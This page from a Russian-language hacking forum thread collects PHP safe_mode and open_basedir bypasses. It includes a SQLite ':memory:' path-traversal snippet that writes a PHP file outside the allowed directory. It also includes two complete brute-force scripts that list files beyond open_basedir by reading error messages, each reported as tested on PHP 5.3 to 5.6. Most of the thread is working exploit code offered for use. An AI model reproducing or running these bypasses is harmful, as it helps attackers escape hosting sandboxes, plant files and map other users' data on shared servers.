Safe_mode and open_basedir bypasses - Страница 3

12309 · 29.08.2012, 21:05

5.2 уязвимы?

BlackFan · 30.08.2012, 07:50

По идее да, так как такие же проверки использовались по всех расширениях:
sqlite, sqlite3, pdo_sqlite

l1ght · 30.08.2012, 09:56

Цитата:

Сообщение от 12309

5.2 уязвимы?

PHP 5 < 5.4

PHP код:


			
    mkdir(':memory:');

    $database = new SQLiteDatabase(":memory:/../../test.php");

    $database->query("CREATE TABLE foo (bar STRING)");

    $database->query("INSERT INTO foo (bar) VALUES ('<?php phpinfo(); ?>')");

    rmdir(':memory:');

спасибо BlackFan =*

InSys · 29.11.2012, 15:51

Не против, я пропиарю еще один способ? >тыц<
(обход сейфмода при PHP+CGI, любая версия php, и при fastcgi тоже кстати)

zuzzz · 08.10.2014, 08:24

Еще вариант чтения списка файлов за пределами open_basedir. Так же основан на разнице текста ошибок при существующим и отсутствующим файлом в include. Используется переназначение include_path.

Код:

файл сущестует:
Warning: include(): open_basedir restriction in effect. File(D:\site\file.txt) is not within the allowed path(s): (d:/site/www/) .....

файл отсутствует:
Warning: include(file1.txt): failed to open stream: No such file or directory in .....

Код:

<?php
 ini_set('display_errors', 1);
 ini_set('display_startup_errors',1);
 ini_set('error_reporting', E_ALL);
 ini_set('log_errors', 0);
 ini_set('html_errors',0);
 ini_set('max_execution_time',0);

 $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789-_.';
 $alphabet_len = strlen($alphabet);
 $maxlength = 3;
 $str = '';

 $dir = '../';
 if (isset($_GET['dir'])) {
     $dir = $_GET['dir'];
 }

 $ext = '';
 if (isset($_GET['ext'])) {
     $ext = $_GET['ext'];
     if (isset($ext[0]) && $ext[0] != '.') {
         $ext = '.'.$ext;
     }
 }

 function inc($s,$i) {
     global $alphabet_len;
     if(!isset($s[$i])) {
         $s[$i] = 0;
         return $s;
     }
     if($s[$i] + 1 == $alphabet_len) {
         $s[$i] = 0;
         $s = inc($s,$i+1);
     } else {
         $s[$i]++;
     }
     return $s;
 } 

 function check2($s) {
     global $str,$alphabet,$ext;
     $str = 'a';
     for($i = 0; $i < count($s); $i++) {
         $str[$i] = $alphabet[$s[$i]];
     }
     include $str.$ext;
 }
     
 function eh($errno, $errstr, $errfile, $errline) { 
     global $str, $ext; 
     if (substr_count($errstr, 'open_basedir restriction') > 0) {
       echo $str.$ext.'<br/>';
     }
 }

 set_error_handler("eh"); 

 echo 'open_basedir = '.ini_get('open_basedir').'<br>';
 echo 'include_path = '.ini_get('include_path').'<br>';
 echo 'set include_path = '.$dir.'<br>';
 ini_set('include_path', $dir);
 echo 'include_path = '.ini_get('include_path').'<br>';

 $s = array(); 
 while(count($s = inc($s,0)) <= $maxlength) {
     check2($s);
 }

echo '<br>end';

?>

проверил на
php 5.3.3
php 5.4.4
php 5.6.1 (windows)

zuzzz · 08.10.2014, 08:41

И еще вариант. Так же разница в тексте ошибки. Если файл существует, то путь до файла вида "/../file.txt" нормализуется до вида "site\file.txt"

Код:

файл сущестует:
Warning: include(): open_basedir restriction in effect. File(D:\site\file.txt) is not within the allowed path(s): (d:/site/www/) .....

файл отсутствует:
Warning: include(): open_basedir restriction in effect. File(../file1.txt) is not within the allowed path(s): (d:/site/www/) .....

Код:

<?php
 ini_set('display_errors', 1);
 ini_set('display_startup_errors',1);
 ini_set('error_reporting', E_ALL);
 ini_set('log_errors', 0);
 ini_set('html_errors',0);
 ini_set('max_execution_time',0);

 $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789-_.';
 $alphabet_len = strlen($alphabet);
 $maxlength = 1;
 $str = '';

 $dir = '../';
 if (isset($_GET['dir'])) {
     $dir = $_GET['dir'];
 }

 $ext = '';
 if (isset($_GET['ext'])) {
     $ext = $_GET['ext'];
     if (isset($ext[0]) && $ext[0] != '.') {
       $ext = '.'.$ext;
     }
 }

 function inc($s,$i) {
     global $alphabet_len;
     if(!isset($s[$i])) {
       $s[$i] = 0;
       return $s;
     }
     if($s[$i] + 1 == $alphabet_len) {
       $s[$i] = 0;
       $s = inc($s,$i+1);
     } else {
       $s[$i]++;
     }
     return $s;
  } 

  function check3($s) {
      global $str,$alphabet,$dir,$ext;
      $str = 'a';
      for($i = 0; $i < count($s); $i++) {
          $str[$i] = $alphabet[$s[$i]];
      }
      include $dir.'/./'.$str.$ext;
  }
     
  function eh($errno, $errstr, $errfile, $errline) { 
      global $str, $ext; 
      if (substr_count($errstr, '/./') == 0) {
        echo $str.$ext.'<br/>';
      }
  }

 set_error_handler("eh"); 
 echo 'open_basedir = '.ini_get('open_basedir').'<br>';

  $s = array(); 
  while(count($s = inc($s,0)) <= $maxlength) {
      check3($s);
  }

echo '<br>end';

?>

проверил на
php 5.3.3
php 5.4.4
php 5.6.1 (windows)

30.08.2012, 07:50	#22
BlackFan Регистрация: 08.07.2010 Сообщений: 354 Репутация: 402	По идее да, так как такие же проверки использовались по всех расширениях: sqlite, sqlite3, pdo_sqlite Последний раз редактировалось BlackFan; 30.08.2012 в 08:15..

29.11.2012, 15:51	#24
InSys Регистрация: 13.03.2012 Сообщений: 15 Репутация: 4	Не против, я пропиарю еще один способ? >тыц< (обход сейфмода при PHP+CGI, любая версия php, и при fastcgi тоже кстати) __________________ Мой бложек о веб безопасности, кодинге и о прочем... Последний раз редактировалось InSys; 29.11.2012 в 19:23..

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

29.08.2012, 21:05	#21
12309 Регистрация: 25.12.2011 Сообщений: 265 Репутация: 33	5.2 уязвимы?